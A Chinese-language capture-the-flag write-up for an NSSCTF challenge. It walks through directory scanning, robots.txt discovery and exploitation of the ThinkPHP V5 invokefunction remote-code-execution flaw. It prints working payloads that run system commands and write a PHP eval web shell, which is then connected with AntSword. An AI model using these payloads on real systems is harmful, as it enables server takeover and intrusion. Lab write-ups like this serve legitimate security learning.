打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
然后访问:/NSS/index.php/:
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。
payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)
再访问/NSS/shell.php
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag